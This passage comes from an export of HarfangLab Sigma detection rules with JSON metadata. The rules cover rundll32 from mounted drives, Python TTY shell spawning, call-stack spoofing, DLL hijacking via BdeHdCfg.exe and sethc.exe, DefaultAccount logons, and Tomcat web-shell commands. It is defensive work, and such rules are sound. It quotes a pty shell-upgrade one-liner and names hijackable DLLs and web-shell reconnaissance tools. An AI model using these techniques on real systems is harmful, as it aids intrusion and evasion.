"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625508Z",
"creation_date": "2026-03-23T11:45:34.625510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625515Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://scythe.io/threat-thursday/threat-thursday-evading-defenses-with-iso-files-like-nobelium",
"https://attack.mitre.org/techniques/T1204/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1204_rundll32_from_mounted_drive.yml",
"content": "title: DLL in Mounted Drive Loaded via RunDLL32\nid: defc0f54-4516-4f30-b2ee-0ac0e8d9ddde\ndescription: |\n Detects the loading of a DLL by RunDLL32 from a mounted drive.\n It is often the result of a spearphishing attack via a removable media such as a compromised USB key or via an ISO or IMG file.\n Attackers may abuse it to gain execution and to avoid detection.\n It is recommended to check the executed binary for malicious behavior or content.\nreferences:\n - https://scythe.io/threat-thursday/threat-thursday-evading-defenses-with-iso-files-like-nobelium\n - https://attack.mitre.org/techniques/T1204/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/12/10\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: library_event\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'RUNDLL32.EXE'\n ImageLoadedDriveType:\n - 'removable'\n - 'disk_image'\n\n filter_signed:\n Signed: 'true'\n\n exclusion_legit_libraries:\n ImageLoaded|endswith:\n - '\\RocketDock\\App\\RocketDock\\RocketDock.dll'\n - '\\_cdres\\_exe\\Install Navigator\\E_UPWJ01.dll'\n - '\\LIB\\TESTPRINT64.DLL'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "defc0f54-4516-4f30-b2ee-0ac0e8d9ddde",
"rule_name": "DLL in Mounted Drive Loaded via RunDLL32",
"rule_description": "Detects the loading of a DLL by RunDLL32 from a mounted drive.\nIt is often the result of a spearphishing attack via a removable media such as a compromised USB key or via an ISO or IMG file.\nAttackers may abuse it to gain execution and to avoid detection.\nIt is recommended to check the executed binary for malicious behavior or content.\n",
"rule_creation_date": "2025-12-10",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204",
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "defd80da-a76f-493b-a3e0-92af72fd97bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618196Z",
"creation_date": "2026-03-23T11:45:34.618198Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618203Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell",
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1059_006_interactive_shell_python_macos.yml",
"content": "title: Interactive Shell Spawned via Python (macOS)\nid: defd80da-a76f-493b-a3e0-92af72fd97bc\ndescription: |\n Detects a suspicious command line related to an interactive shell execution via Python.\n Attackers sometimes obtain a simple reverse shell without having a TTY, which limits the interactions with the system.\n To launch command lines like su or sudo, the attacker needs to obtain an interactive shell.\n It is recommended to investigate the parent and children processes of the python process for any suspicious activities.\nreferences:\n - https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # python -c 'import pty; pty.spawn(\"/bin/sh\")'\n selection_command:\n CommandLine|contains|all:\n - 'python'\n - 'import pty'\n - ';'\n - '.spawn('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "defd80da-a76f-493b-a3e0-92af72fd97bc",
"rule_name": "Interactive Shell Spawned via Python (macOS)",
"rule_description": "Detects a suspicious command line related to an interactive shell execution via Python.\nAttackers sometimes obtain a simple reverse shell without having a TTY, which limits the interactions with the system.\nTo launch command lines like su or sudo, the attacker needs to obtain an interactive shell.\nIt is recommended to investigate the parent and children processes of the python process for any suspicious activities.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "df65ef88-956a-4cd6-aaaa-54467067c5ac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616583Z",
"creation_date": "2026-03-23T11:45:34.616587Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616594Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_process_callstack_spoofing_vulcan_raven.yml",
"content": "title: Spoofed Process Call Stack Related to VulcanRaven\nid: df65ef88-956a-4cd6-aaaa-54467067c5ac\ndescription: |\n Detects arbitrary call stacks related to the VulcanRaven PoC.\n VulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\n Attackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\n It is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\nreferences:\n - https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/11/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_wmi_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'CorperfmonExt.dll'\n - 'kernel32.dll'\n - 'ntdll.dll'\n StackTrace|contains:\n - 'CorperfmonExt.dll+0xc669'\n - 'CorperfmonExt.dll+0xc71b'\n - 'CorperfmonExt.dll+0x2fde'\n\n selection_sysmain_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'sysmain.dll'\n - 'svchost.exe'\n - 'sechost.dll'\n StackTrace|contains:\n - 'sysmain.dll+0x80e5f'\n - 'sysmain.dll+0x60ce6'\n - 'sysmain.dll+0x2a7d3'\n\n selection_rpc_callstack:\n MinimalStackTrace|contains|all:\n - 'kernelbase.dll'\n - 'lsm.dll'\n - 'RPCRT4.dll'\n StackTrace|contains:\n - 'RPCRT4.dll+0x79633'\n - 'RPCRT4.dll+0x13711'\n - 'RPCRT4.dll+0xdd77b'\n - 'lsm.dll+0xe959'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "df65ef88-956a-4cd6-aaaa-54467067c5ac",
"rule_name": "Spoofed Process Call Stack Related to VulcanRaven",
"rule_description": "Detects arbitrary call stacks related to the VulcanRaven PoC.\nVulcanRaven employs call stack spoofing techniques to evade detection by EDR solutions, it manipulates thread call stacks to appear as legitimate Windows system operations, making malicious activities blend in with normal system behavior.\nAttackers may try to bypass EDR behavioral detection by forging call stacks that mimic trusted system processes and libraries, thereby evading stack-based heuristics and memory analysis.\nIt is recommended to investigate the source process, validate the legitimacy of the call chain, examine memory for inconsistencies, and correlate with other suspicious activities from the same process or parent process.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-11-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "df7adcea-e208-4cf1-b679-655e413d9d58",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588551Z",
"creation_date": "2026-03-23T11:45:34.588554Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588562Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdehdcfg.yml",
"content": "title: DLL Hijacking via BdeHdCfg.exe\nid: df7adcea-e208-4cf1-b679-655e413d9d58\ndescription: |\n Detects potential Windows DLL Hijacking via BdeHdCfg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BdeHdCfg.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\winbrand.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\cisco systems\\cisco jabber\\'\n - '?:\\Program Files (x86)\\microsoft office\\root\\office*\\'\n - '?:\\Program Files (x86)\\microsoft office\\root\\vfs\\programfilesx86\\microsoft analysis services\\as oledb\\140\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\arm64\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\arm64\\srcsrv\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\arm\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\arm\\srcsrv\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x64\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x64\\srcsrv\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x86\\'\n - '?:\\Program Files (x86)\\windows kits\\10\\debuggers\\x86\\srcsrv\\'\n - '?:\\Program Files\\cisco systems\\cisco jabber\\'\n - '?:\\Program Files\\microsoft office\\root\\office*\\'\n - '?:\\Program Files\\microsoft office\\root\\vfs\\programfilesx86\\microsoft analysis services\\as oledb\\140\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm64\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm64\\srcsrv\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\arm\\srcsrv\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x64\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x64\\srcsrv\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x86\\'\n - '?:\\Program Files\\windows kits\\10\\debuggers\\x86\\srcsrv\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "df7adcea-e208-4cf1-b679-655e413d9d58",
"rule_name": "DLL Hijacking via BdeHdCfg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BdeHdCfg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0209ce2-3915-47cb-8a9b-7705ee65e84b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072471Z",
"creation_date": "2026-03-23T11:45:34.072473Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072477Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_defaultaccount_authentication.yml",
"content": "title: DefaultAccount Account Authentication\nid: e0209ce2-3915-47cb-8a9b-7705ee65e84b\ndescription: |\n Detects authentication of the DefaultAccount account, also known as the Default System Managed Account (DSMA).\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate action made within the newly created session.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#defaultaccount\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2023/12/12\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection_eventid:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4624\n LogonType:\n - '3'\n - '10'\n\n selection_account:\n - TargetUserSid|endswith: '-503'\n - SubjectUserSid|endswith: '-503'\n\n condition: all of selection_*\nlevel: high\n# level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0209ce2-3915-47cb-8a9b-7705ee65e84b",
"rule_name": "DefaultAccount Account Authentication",
"rule_description": "Detects authentication of the DefaultAccount account, also known as the Default System Managed Account (DSMA).\nThis account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\nIt is recommended to investigate action made within the newly created session.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e021ad68-b12f-4190-b70f-e79e622e5860",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296440Z",
"creation_date": "2026-03-23T11:45:35.296442Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296447Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1203_tomcat_suspicious_command.yml",
"content": "title: Suspicious Command Executed by Tomcat\nid: e021ad68-b12f-4190-b70f-e79e622e5860\ndescription: |\n Detects the execution of a suspicious command by the Tomcat web server software likely related to a web shell or a command injection via a vulnerable application.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems.\n It is recommended to verify the legitimacy of this command and check any other command executed by the Tomcat server.\nreferences:\n - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2023/04/11\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.persistence\n - attack.t1505.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.InitialAccess\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_user:\n User:\n - 'root'\n - 'www-data'\n - 'tomcat'\n - 'web'\n\n # NOTE: Tomcat is executed via java and its main class is 'org.apache.catalina.startup.Bootstrap'\n selection_parent:\n ParentImage|endswith: 'java'\n ParentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n selection_grandparent:\n GrandparentImage|endswith: 'java'\n GrandparentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n\n selection_image:\n - Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n - '/cat'\n - '/crontab'\n - '/hostname'\n - '/ifconfig'\n - '/ip'\n - '/iptables'\n - '/ls'\n - '/netstat'\n - '/pwd'\n - '/route'\n - '/whoami'\n - '/w'\n # To many false positive\n #- '/uname'\n - CommandLine|contains: 'sh -c uname'\n\n exclusion_iparapheur_pdf:\n CommandLine: 'curl --silent -G -f*--data-urlencode command=*/opt/iParapheur/*'\n\n exclusion_grangle:\n - CommandLine:\n - 'cat /GRANGLE/*/versions'\n - 'ls -1 /GRANGLE/appserver/*'\n - 'ls /GRANGLE/*'\n - CommandLine|startswith: 'ls -pAHL /'\n Ancestors|contains: '/GRANGLE/appserver/'\n\n exclusion_lsprodpid:\n CommandLine: 'ls -f /proc/*/fd'\n\n exclusion_aptare:\n CommandLine: 'hostname --fqdn'\n CurrentDirectory: '/opt/aptare/bin/'\n\n exclusion_soffice:\n CommandLine: '/bin/domainname'\n Ancestors|contains:\n - '/opt/openoffice4/program/soffice.bin|'\n - '/opt/openoffice.org/program/soffice.bin|'\n - '/opt/openoffice.org?/program/soffice.bin|'\n\n exclusion_arcsight:\n CommandLine:\n - '/bin/hostname'\n - '/bin/netstat -an'\n CurrentDirectory|contains: '/arcsight/'\n\n condition: selection_user and (selection_parent or selection_grandparent) and selection_image and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e021ad68-b12f-4190-b70f-e79e622e5860",
"rule_name": "Suspicious Command Executed by Tomcat",
"rule_description": "Detects the execution of a suspicious command by the Tomcat web server software likely related to a web shell or a command injection via a vulnerable application.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems.\nIt is recommended to verify the legitimacy of this command and check any other command executed by the Tomcat server.\n",
"rule_creation_date": "2023-04-11",
"rule_modified_date": "2026-02-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e06d3a0a-a3d4-4ef3-86b9-365b9bc9ccd1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081188Z",
"creation_date": "2026-03-23T11:45:34.081190Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081195Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sethc.yml",
"content": "title: DLL Hijacking via sethc.exe\nid: e06d3a0a-a3d4-4ef3-86b9-365b9bc9ccd1\ndescription: |\n Detects potential Windows DLL Hijacking via sethc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sethc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\oleacc.dll'\n - '\\playsndsrv.dll'\n - '\\uxtheme.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e06d3a0a-a3d4-4ef3-86b9-365b9bc9ccd1",
"rule_name": "DLL Hijacking via sethc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sethc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e07c8f70-5bf0-46b1-8151-7bddc3acca2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087952Z",
"creation_date": "2026-03-23T11:45:34.087954Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087966Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://attack.mitre.org/techniques/T1553/002/"
],
